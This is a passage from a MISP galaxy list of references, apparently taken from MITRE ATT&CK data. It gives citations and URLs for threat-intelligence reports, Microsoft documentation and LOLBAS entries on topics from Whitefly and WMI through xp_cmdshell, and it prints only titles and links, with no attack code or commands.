Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="Symantec Whitefly March 2019"

Table 16118. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore

Accenture Lyceum Targets November 2021

Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.

The tag is: misp-galaxy:references="Accenture Lyceum Targets November 2021"

Table 16119. Table References

Links

https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns

Krebs-Anna

Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai Worm Author?. Retrieved May 15, 2017.

The tag is: misp-galaxy:references="Krebs-Anna"

Table 16120. Table References

Links

https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/

CrowdStrike Ember Bear Profile March 2022

CrowdStrike. (2022, March 30). Who is EMBER BEAR?. Retrieved June 9, 2022.

The tag is: misp-galaxy:references="CrowdStrike Ember Bear Profile March 2022"

Table 16121. Table References

Links

https://www.crowdstrike.com/blog/who-is-ember-bear/

WHOIS

NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="WHOIS"

Table 16122. Table References

Links

https://www.whois.net/

Meyers Numbered Panda

Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="Meyers Numbered Panda"

Table 16123. Table References

Links

http://www.crowdstrike.com/blog/whois-numbered-panda/

CrowdStrike PIONEER KITTEN August 2020

Orleans, A. (2020, August 31). Who Is PIONEER KITTEN?. Retrieved December 21, 2020.

The tag is: misp-galaxy:references="CrowdStrike PIONEER KITTEN August 2020"

Table 16124. Table References

Links

https://www.crowdstrike.com/blog/who-is-pioneer-kitten/

SECURELIST Bright Star 2015

Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really Spreading through the Bright Star?. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="SECURELIST Bright Star 2015"

Table 16125. Table References

Links

https://securelist.com/whos-really-spreading-through-the-bright-star/68978/

Trend Micro Privileged Container

Fiser, D., Oliveira, A. (2019, December 20). Why a Privileged Container in Docker is a Bad Idea. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Trend Micro Privileged Container"

Table 16126. Table References

Links

https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html

Mandiant UNC3944 September 14 2023

Mandiant Intelligence. (2023, September 14). Why Are You Texting Me? UNC3944 Leverages SMS Phishing Campaigns for SIM Swapping, Ransomware, Extortion, and Notoriety. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="Mandiant UNC3944 September 14 2023"

Table 16127. Table References

Links

https://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware

Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019

Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019"

Table 16128. Table References

Links

https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/

Securelist Digital Certificates

Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.

The tag is: misp-galaxy:references="Securelist Digital Certificates"

Table 16129. Table References

Links

https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/

Crowdstrike DNS Hijack 2019

Matt Dahl. (2019, January 25). Widespread DNS Hijacking Activity Targets Multiple Sectors. Retrieved February 14, 2022.

The tag is: misp-galaxy:references="Crowdstrike DNS Hijack 2019"

Table 16130. Table References

Links

https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/

Wi-Fi Password of All Connected Networks in Windows/Linux

Geeks for Geeks. (n.d.). Wi-Fi Password of All Connected Networks in Windows/Linux. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Wi-Fi Password of All Connected Networks in Windows/Linux"

Table 16131. Table References

Links

https://www.geeksforgeeks.org/wi-fi-password-connected-networks-windowslinux/

Wikipedia Exe Compression

Executable compression. (n.d.). Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Wikipedia Exe Compression"

Table 16132. Table References

Links

http://en.wikipedia.org/wiki/Executable_compression

ESET Carberp March 2012

Matrosov, A., Rodionov, E., Volkov, D., Harley, D. (2012, March 2). Win32/Carberp When You’re in a Black Hole, Stop Digging. Retrieved July 15, 2020.

The tag is: misp-galaxy:references="ESET Carberp March 2012"

Table 16133. Table References

Links

https://www.eset.com/fileadmin/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf

ESET Industroyer

Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial control systems. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="ESET Industroyer"

Table 16134. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Microsoft Kasidet

Manuel, J. and Plantado, R. (2015, August 9). Win32/Kasidet. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="Microsoft Kasidet"

Table 16135. Table References

Links

http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2FKasidet

ESET Ebury Oct 2017

Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update. Retrieved February 10, 2021.

The tag is: misp-galaxy:references="ESET Ebury Oct 2017"

Table 16136. Table References

Links

https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/

Microsoft AMSI June 2015

Microsoft. (2015, June 9). Windows 10 to offer application developers new malware defenses. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="Microsoft AMSI June 2015"

Table 16137. Table References

Links

https://cloudblogs.microsoft.com/microsoftsecure/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/?source=mmpc

Davidson Windows

Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Davidson Windows"

Table 16138. Table References

Links

http://www.pretentiousname.com/misc/win7_uac_whitelist2.html

IRED API Hashing

spotheplanet. (n.d.). Windows API Hashing in Malware. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="IRED API Hashing"

Table 16139. Table References

Links

https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware

TrendMicro WindowsAppMac

Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads Info Stealer and Adware. Retrieved April 25, 2019.

The tag is: misp-galaxy:references="TrendMicro WindowsAppMac"

Table 16140. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/

Windows Commands JPCERT

Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.

The tag is: misp-galaxy:references="Windows Commands JPCERT"

Table 16141. Table References

Links

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

Amplia WCE

Amplia Security. (n.d.). Windows Credentials Editor (WCE) F.A.Q.. Retrieved December 17, 2015.

The tag is: misp-galaxy:references="Amplia WCE"

Table 16142. Table References

Links

http://www.ampliasecurity.com/research/wcefaq.html

Microsoft Windows Defender Application Control

Gorzelany, A., Hall, J., Poggemeyer, L. (2019, January 7). Windows Defender Application Control. Retrieved July 16, 2019.

The tag is: misp-galaxy:references="Microsoft Windows Defender Application Control"

Table 16143. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control

Microsoft Operation Wilysupply

Florio, E. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="Microsoft Operation Wilysupply"

Table 16144. Table References

Links

https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/

PassLib mscache

Eli Collins. (2016, November 25). Windows' Domain Cached Credentials v2. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="PassLib mscache"

Table 16145. Table References

Links

https://passlib.readthedocs.io/en/stable/lib/passlib.hash.msdcc2.html

ProjectZero File Write EoP Apr 2018

Forshaw, J. (2018, April 18). Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege. Retrieved May 3, 2018.

The tag is: misp-galaxy:references="ProjectZero File Write EoP Apr 2018"

Table 16146. Table References

Links

https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html

DBAPPSecurity BITTER zero-day Feb 2021

JinQuan, MaDongZe, TuXiaoYi, and LiHao. (2021, February 10). Windows kernel zero-day exploit (CVE-2021-1732) is used by BITTER APT in targeted attack. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="DBAPPSecurity BITTER zero-day Feb 2021"

Table 16147. Table References

Links

https://ti.dbappsecurity.com.cn/blog/articles/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/

EyeofRa Detecting Hooking June 2017

Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense against user-land. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="EyeofRa Detecting Hooking June 2017"

Table 16148. Table References

Links

https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/

Passcape LSA Secrets

Passcape. (n.d.). Windows LSA secrets. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="Passcape LSA Secrets"

Table 16149. Table References

Links

https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

Windows Malware Infecting Android

Lucian Constantin. (2014, January 23). Windows malware tries to infect Android devices connected to PCs. Retrieved May 25, 2022.

The tag is: misp-galaxy:references="Windows Malware Infecting Android"

Table 16150. Table References

Links

https://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-connected-to-pcs.html

MSDN WMI

Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.

The tag is: misp-galaxy:references="MSDN WMI"

Table 16151. Table References

Links

https://msdn.microsoft.com/en-us/library/aa394582.aspx

FireEye WMI 2015

Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.

The tag is: misp-galaxy:references="FireEye WMI 2015"

Table 16152. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

win_msc_files_overview

Brinkmann, M. (2017, June 10). Windows .msc files overview. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="win_msc_files_overview"

Table 16153. Table References

Links

https://www.ghacks.net/2017/06/10/windows-msc-files-overview/

Hill NT Shell

Hill, T. (n.d.). Windows NT Command Shell. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Hill NT Shell"

Table 16154. Table References

Links

http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120

passcape Windows Vault

Passcape. (n.d.). Windows Password Recovery - Vault Explorer and Decoder. Retrieved November 24, 2020.

The tag is: misp-galaxy:references="passcape Windows Vault"

Table 16155. Table References

Links

https://www.passcape.com/windows_password_recovery_vault_explorer

Malware Archaeology PowerShell Cheat Sheet

Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.

The tag is: misp-galaxy:references="Malware Archaeology PowerShell Cheat Sheet"

Table 16156. Table References

Links

http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf

TechNet PowerShell

Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.

The tag is: misp-galaxy:references="TechNet PowerShell"

Table 16157. Table References

Links

https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx

Windows Privilege Escalation Guide

absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.

The tag is: misp-galaxy:references="Windows Privilege Escalation Guide"

Table 16158. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

SploitSpren Windows Priv Jan 2018

McFarland, R. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.

The tag is: misp-galaxy:references="SploitSpren Windows Priv Jan 2018"

Table 16159. Table References

Links

https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/

SecurityBoulevard Unquoted Services APR 2018

HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018.

The tag is: misp-galaxy:references="SecurityBoulevard Unquoted Services APR 2018"

Table 16160. Table References

Links

https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/

Windows Unquoted Services

HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018.

The tag is: misp-galaxy:references="Windows Unquoted Services"

Table 16161. Table References

Links

https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/

Windows Process Injection KernelCallbackTable

odzhan. (2019, May 25). Windows Process Injection: KernelCallbackTable used by FinFisher / FinSpy. Retrieved February 4, 2022.

The tag is: misp-galaxy:references="Windows Process Injection KernelCallbackTable"

Table 16162. Table References

Links

https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/

Modexp Windows Process Injection

odzhan. (2019, April 25). Windows Process Injection: WordWarping, Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline. Retrieved November 15, 2021.

The tag is: misp-galaxy:references="Modexp Windows Process Injection"

Table 16163. Table References

Links

https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/

Wikipedia Windows Registry

Wikipedia. (n.d.). Windows Registry. Retrieved February 2, 2015.

The tag is: misp-galaxy:references="Wikipedia Windows Registry"

Table 16164. Table References

Links

https://en.wikipedia.org/wiki/Windows_Registry

Cylance Reg Persistence Sept 2013

Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Cylance Reg Persistence Sept 2013"

Table 16165. Table References

Links

https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order

Microsoft WinRM

Microsoft. (n.d.). Windows Remote Management. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Microsoft WinRM"

Table 16166. Table References

Links

http://msdn.microsoft.com/en-us/library/aa384426

Symantec Windows Rootkits

Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="Symantec Windows Rootkits"

Table 16167. Table References

Links

https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf

insecure_reg_perms

Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.

The tag is: misp-galaxy:references="insecure_reg_perms"

Table 16168. Table References

Links

https://itm4n.github.io/windows-registry-rpceptmapper-eop/

Microsoft Windows Scripts

Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="Microsoft Windows Scripts"

Table 16169. Table References

Links

https://docs.microsoft.com/scripting/winscript/windows-script-interfaces

Microsoft Security Event 4670

Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019.

The tag is: misp-galaxy:references="Microsoft Security Event 4670"

Table 16170. Table References

Links

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670

Windows Log Events

Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="Windows Log Events"

Table 16171. Table References

Links

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/

winser19_file_overwrite_bug_twitter

Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022.

The tag is: misp-galaxy:references="winser19_file_overwrite_bug_twitter"

Table 16172. Table References

Links

https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040

Windows Server Containers Are Open

Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here’s How You Can Break Out. Retrieved October 1, 2021.

The tag is: misp-galaxy:references="Windows Server Containers Are Open"

Table 16173. Table References

Links

https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/

Sysinternals AppCertDlls Oct 2007

Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="Sysinternals AppCertDlls Oct 2007"

Table 16174. Table References

Links

https://forum.sysinternals.com/appcertdlls_topic12546.html

Russinovich Sysinternals

Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.

The tag is: misp-galaxy:references="Russinovich Sysinternals"

Table 16175. Table References

Links

https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

Microsoft System Services Fundamentals

Microsoft. (2018, February 17). Windows System Services Fundamentals. Retrieved March 28, 2022.

The tag is: misp-galaxy:references="Microsoft System Services Fundamentals"

Table 16176. Table References

Links

https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx

Technet Windows Time Service

Mathers, B. (2016, September 30). Windows Time Service Tools and Settings. Retrieved November 25, 2016.

The tag is: misp-galaxy:references="Technet Windows Time Service"

Table 16177. Table References

Links

https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings

Microsoft W32Time May 2017

Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018.

The tag is: misp-galaxy:references="Microsoft W32Time May 2017"

Table 16178. Table References

Links

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings

Microsoft W32Time Feb 2018

Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018.

The tag is: misp-galaxy:references="Microsoft W32Time Feb 2018"

Table 16179. Table References

Links

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top

Microsoft CVE-2021-1732 Feb 2021

Microsoft. (2018, February 9). Windows Win32k Elevation of Privilege Vulnerability CVE-2021-1732. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="Microsoft CVE-2021-1732 Feb 2021"

Table 16180. Table References

Links

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732

win_xml_evt_log

Forensics Wiki. (2021, June 19). Windows XML Event Log (EVTX). Retrieved September 13, 2021.

The tag is: misp-galaxy:references="win_xml_evt_log"

Table 16181. Table References

Links

https://forensicswiki.xyz/wiki/index.php?title=Windows_XML_Event_Log_(EVTX)

Winexe Github Sept 2013

Skalkotos, N. (2013, September 20). WinExe. Retrieved January 22, 2018.

The tag is: misp-galaxy:references="Winexe Github Sept 2013"

Table 16182. Table References

Links

https://github.com/skalkoto/winexe/

Microsoft WinExec

Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft WinExec"

Table 16183. Table References

Links

http://msdn.microsoft.com/en-us/library/ms687393

winget.exe - LOLBAS Project

LOLBAS. (2022, January 3). winget.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="winget.exe - LOLBAS Project"

Table 16184. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Winget/

PreKageo Winhook Jul 2011

Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="PreKageo Winhook Jul 2011"

Table 16185. Table References

Links

https://github.com/prekageo/winhook

Novetta Winnti April 2015

Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.

The tag is: misp-galaxy:references="Novetta Winnti April 2015"

Table 16186. Table References

Links

https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf

Chronicle Winnti for Linux May 2019

Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.

The tag is: misp-galaxy:references="Chronicle Winnti for Linux May 2019"

Table 16187. Table References

Links

https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a

WinRAR Website

WinRAR. (n.d.). WinRAR download free and support: WinRAR. Retrieved December 18, 2023.

The tag is: misp-galaxy:references="WinRAR Website"

Table 16188. Table References

Links

https://www.win-rar.com/

winrm.vbs - LOLBAS Project

LOLBAS. (2018, May 25). winrm.vbs. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="winrm.vbs - LOLBAS Project"

Table 16189. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Winrm/

Microsoft WinVerifyTrust

Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="Microsoft WinVerifyTrust"

Table 16190. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx

Winword.exe - LOLBAS Project

LOLBAS. (2019, July 19). Winword.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Winword.exe - LOLBAS Project"

Table 16191. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/

WinZip Homepage

Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.

The tag is: misp-galaxy:references="WinZip Homepage"

Table 16192. Table References

Links

https://www.winzip.com/win/en/

Dell Wiper

Dell SecureWorks. (2013, March 21). Wiper Malware Analysis Attacking Korean Financial Sector. Retrieved May 13, 2015.

The tag is: misp-galaxy:references="Dell Wiper"

Table 16193. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/

WireLurker

Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.

The tag is: misp-galaxy:references="WireLurker"

Table 16194. Table References

Links

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

Lab52 WIRTE Apr 2019

S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.

The tag is: misp-galaxy:references="Lab52 WIRTE Apr 2019"

Table 16195. Table References

Links

https://lab52.io/blog/wirte-group-attacking-the-middle-east/

Kaspersky WIRTE November 2021

Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022.

The tag is: misp-galaxy:references="Kaspersky WIRTE November 2021"

Table 16196. Table References

Links

https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044

Cofense RevengeRAT Feb 2019

Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019.

The tag is: misp-galaxy:references="Cofense RevengeRAT Feb 2019"

Table 16197. Table References

Links

https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/

CrowdStrike Wizard Spider October 2020

Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.

The tag is: misp-galaxy:references="CrowdStrike Wizard Spider October 2020"

Table 16198. Table References

Links

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

Wlrmdr.exe - LOLBAS Project

LOLBAS. (2022, February 16). Wlrmdr.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Wlrmdr.exe - LOLBAS Project"

Table 16199. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/

Microsoft WMI Architecture

Microsoft. (2018, May 31). WMI Architecture. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Microsoft WMI Architecture"

Table 16200. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture

LOLBAS Wmic

LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Wmic"

Table 16201. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Wmic/

Microsoft WMI System Classes

Microsoft. (2018, May 31). WMI System Classes. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Microsoft WMI System Classes"

Table 16202. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes

MalwareBytes WoodyRAT Aug 2022

MalwareBytes Threat Intelligence Team. (2022, August 3). Woody RAT: A new feature-rich malware spotted in the wild. Retrieved December 6, 2022.

The tag is: misp-galaxy:references="MalwareBytes WoodyRAT Aug 2022"

Table 16203. Table References

Links

https://www.malwarebytes.com/blog/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild

WorkFolders.exe - LOLBAS Project

LOLBAS. (2021, August 16). WorkFolders.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="WorkFolders.exe - LOLBAS Project"

Table 16204. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/

Confluence Logs

Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Confluence Logs"

Table 16205. Table References

Links

https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html

AppInit Registry

Microsoft. (2006, October). Working with the AppInit_DLLs registry value. Retrieved July 15, 2015.

The tag is: misp-galaxy:references="AppInit Registry"

Table 16206. Table References

Links

https://support.microsoft.com/en-us/kb/197571

ESF_filemonitor

Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple’s Endpoint Security Framework. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="ESF_filemonitor"

Table 16207. Table References

Links

https://objective-see.com/blog/blog_0x48.html

Writing Bad Malware for OSX

Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.

The tag is: misp-galaxy:references="Writing Bad Malware for OSX"

Table 16208. Table References

Links

https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf

Wscript.exe - LOLBAS Project

LOLBAS. (2018, May 25). Wscript.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Wscript.exe - LOLBAS Project"

Table 16209. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Wscript/

Enigma0x3 PubPrn Bypass

Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Enigma0x3 PubPrn Bypass"

Table 16210. Table References

Links

https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/

Wsl.exe - LOLBAS Project

LOLBAS. (2019, June 27). Wsl.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Wsl.exe - LOLBAS Project"

Table 16211. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/

Wsreset.exe - LOLBAS Project

LOLBAS. (2019, March 18). Wsreset.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Wsreset.exe - LOLBAS Project"

Table 16212. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Wsreset/

wt.exe - LOLBAS Project

LOLBAS. (2022, July 27). wt.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="wt.exe - LOLBAS Project"

Table 16213. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/wt/

wuauclt.exe - LOLBAS Project

LOLBAS. (2020, September 23). wuauclt.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="wuauclt.exe - LOLBAS Project"

Table 16214. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/

XAgentOSX 2017

Robert Falcone. (2017, February 14). XAgentOSX: Sofacy’s Xagent macOS Tool. Retrieved July 12, 2017.

The tag is: misp-galaxy:references="XAgentOSX 2017"

Table 16215. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/

XAgentOSX

Robert Falcone. (2017, February 14). XAgentOSX: Sofacy’s Xagent macOS Tool. Retrieved July 12, 2017.

The tag is: misp-galaxy:references="XAgentOSX"

Table 16216. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/

Unit42 Xbash Sept 2018

Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.

The tag is: misp-galaxy:references="Unit42 Xbash Sept 2018"

Table 16217. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

xCmd

Rayaprolu, A. (2011, April 12). xCmd an Alternative to PsExec. Retrieved August 10, 2016.

The tag is: misp-galaxy:references="xCmd"

Table 16218. Table References

Links

https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/

xcopy Microsoft

Microsoft. (2023, February 3). xcopy Microsoft. Retrieved July 11, 2023.

The tag is: misp-galaxy:references="xcopy Microsoft"

Table 16219. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/xcopy

Dragos Xenotime 2018

Dragos, Inc. (n.d.). Xenotime. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="Dragos Xenotime 2018"

Table 16220. Table References

Links

https://dragos.com/resource/xenotime/

gist Arch package compromise 10JUL2018

Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="gist Arch package compromise 10JUL2018"

Table 16221. Table References

Links

https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a

Trend Micro Exposed Docker Server

Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants Target Exposed Docker Servers. Retrieved April 5, 2021.

The tag is: misp-galaxy:references="Trend Micro Exposed Docker Server"

Table 16222. Table References

Links

https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html

Microsoft xp_cmdshell 2017

Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved September 9, 2019.

